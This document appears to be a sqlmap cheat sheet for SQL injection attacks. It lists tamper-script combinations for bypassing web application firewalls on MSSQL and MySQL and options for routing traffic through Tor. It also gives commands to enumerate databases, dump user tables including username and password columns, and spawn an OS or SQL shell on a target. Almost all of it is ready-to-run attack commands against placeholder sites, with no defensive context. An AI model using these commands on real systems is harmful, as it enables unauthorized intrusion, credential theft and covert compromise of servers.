SqlMap
WAF Bypass
1)MSSQL
tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
2)MySQL
tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
3)General tampering option
tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
WAF bypass example string
sudo sqlmap -m SQLtargets.txt -dbs --batch tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
#WAF bypass using TOR
sqlmap -r request.txt --time-sec=10 --tor --tor-type=SOCKS5 --check-tor
Scanning multiple targets
sudo sqlmap -m SQLtargets.txt -dbs --batch
Easy Scanning option
sqlmap -u "http://testsite.com/login.php"
Scanning by using tor
sqlmap -u "http://testsite.com/login.php" --tor --tor-type=SOCKS5
Scanning by manually setting the return time
sqlmap -u "http://testsite.com/login.php" --time-sec 15
List all databases at the site
sqlmap -u "http://testsite.com/login.php" --dbs
List all tables in a specific database
sqlmap -u "http://testsite.com/login.php" -D site_db --tables
Dump the contents of a DB table
sqlmap -u "http://testsite.com/login.php" -D site_db -T users –dump
List all columns in a table
sqlmap -u "http://testsite.com/login.php" -D site_db -T users --columns
Dump only selected columns
sqlmap -u "http://testsite.com/login.php" -D site_db -T users -C username,password --dump
Dump a table from a database when you have admin credentials
sqlmap -u "http://testsite.com/login.php" –method "POST" –data "username=admin&password=admin&submit=Submit" -D social_mccodes -T users –dump
Get OS Shell
sqlmap --dbms=mysql -u "http://testsite.com/login.php" --os-shell
Get SQL Shell
sqlmap --dbms=mysql -u "http://testsite.com/login.php" --sql-shell
Injecting site.xml pages
//Adjust according to underlying DB and target
sqlmap -u "target/sitemap.xml?offset=1" -p offset --level 5 --risk 3 --dbms=MySQL --hostname --test-filter="MySQL >= 5.0.12 stacked queries"
Last updated